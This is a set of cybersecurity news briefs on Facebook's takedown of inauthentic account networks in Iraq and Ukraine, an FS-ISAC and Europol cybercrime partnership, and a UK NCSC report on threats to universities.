The social network removed 76 Facebook accounts, 120 Pages, one Group, two Events and seven Instagram accounts linked to “coordinated inauthentic behavior” in Iraq. One or more of the Pages managed to garner around 1.6 million followers, while 339,000 accounts followed at least one of the groups, it said.
“The people behind this activity used fake accounts to amplify their content and manage Pages — some of which were likely purchased,” explained Facebook head of cybersecurity policy, Nathaniel Gleicher.
“Many of these Pages merged with one another and changed names over time. They also impersonated other people and used their IDs to conceal their identity and attempt to avoid detection and removal.”
The content itself was largely critical of the US occupation and pro-Saddam Hussein, according to an analysis by the Atlantic Council’s Digital Forensic Research Lab (DFRLab).
A much bigger operation was taken down in Ukraine, where Facebook was forced to remove 168 accounts, 149 Pages and 79 Groups. Around 4.2 million accounts followed one or more of these Pages and around 401,000 accounts joined at least one of the Groups, while a whopping $1.6 million was spent on Facebook and Instagram ads, the social network revealed.
Facebook linked the activity to Ukrainian PR firm Pragmatico, despite attempts to conceal its involvement.
“The people behind this activity used fake accounts to manage Groups and a number of Pages — some of which changed their names over time, and also to increase engagement, disseminate content and drive people to off-platform sites posing as news outlets,” explained Gleicher.
According to another DFRLab analysis, there may have been political intent behind this campaign, although it was also an attempt to build a national audience for media conglomerate Znaj Media Holdings, which is linked to Pragmatico.
“The pages primarily posted local Ukrainian news content, much of which was lifted from other Ukrainian news outlets with only partial attribution,” it concluded. “This network may have been partially politically motivated — some of the pages launched personal attacks against particular Ukrainian politicians — and partially commercial in nature.”
The Financial Services Information Sharing and Analysis Center (FS-ISAC) and Europol’s European Cybercrime Centre (EC3) have announced a partnership to combat cybercrime within the European financial services sector.
The FS-ISAC is an industry consortium dedicated to reducing cyber-risk in the global financial system, and the EC3 protects European citizens, business and governments from online crime.
The Memorandum of Understanding (MOU) between the two will aim to facilitate and enhance the law enforcement response to financially motivated cyber-criminals targeting banks and other financial institutions through a symbiotic intelligence sharing network.
The partnership is a response to the acceleration of sophisticated cyber-attacks in recent years affecting numerous countries and jurisdictions at once. The MOU will help foster a pan-European approach to intelligence sharing, ensuring the cross-border cooperation necessary for the detection, prevention and reduction of cybercrime. In addition to facilitating information sharing, the agreement will also enable education and resilience through training exercises and informational summits.
“Cyber-criminals are increasingly targeting financial services and institutions to the cost of citizens and businesses across the EU,” said Steven Wilson, head of EC3. “It is crucial to bring key stakeholders around the table to improve the coordinated response; this MOU with FS-ISAC builds a platform to allow us to do exactly that.”
Ray Irving, managing director of FS-ISAC, added: “Accelerated global digitalization combined with the growing sophistication of cyber-criminals demands a more concerted approach from both the public and private sector. Through a collaborative peer-to-peer network, FS-ISAC and EC3 are enabling intelligence sharing to better safeguard the global financial system.”
The UK’s National Cyber Security Centre (NCSC) has been forced to issue a new report detailing the threat to the country’s universities from cyber-criminals and nation state operatives.
The NCSC argued that, while the sector has traditionally been one of the most open and outward-facing, both in terms of culture and technology, this makes the attackers’ job even easier.
The main threats are from untargeted cybercrime raids, such as ransomware and bulk personal info theft via phishing, and targeted ones like Business Email Compromise (BEC). However, it also highlighted the challenge posed by nation state hackers looking to steal cutting-edge research and IP.
“While it is highly likely that cybercrime will present the most evident difficulties for universities, state-sponsored espionage will likely cause greater long-term damage. This is particularly true for those universities which prize innovation and research partnerships. This damage will extend to the UK’s larger national interest and to those researchers whose work may give others the chance to 'publish first',” the report argued.
“Nation states almost certainly target universities for the data and information they hold. Cyber offers a deniable route to obtain information that is otherwise unavailable to them. It is likely exploited instead of, or in conjunction with, traditional routes to gain access to research, such as partnering, ‘seconded students’, or direct investment.”
The NCSC warned that attacks on UK universities by nation states could even threaten the long-term health of the country itself.
“There's a realistic possibility that the threat will increase in line with increased scrutiny of foreign direct investment and the minimizing of other avenues to gain insight and advantage,” it added.
The GCHQ spin-off urged university IT teams to focus on: improving user security awareness; enhancing access controls, especially for sensitive data stores; and revisiting network design to segment high-value information.
Iranian hackers have been among the most prolific attackers of university IT systems: just last week more info emerged on the Cobalt Dickens group, which is targeting at least 380 universities worldwide in a major new phishing operation.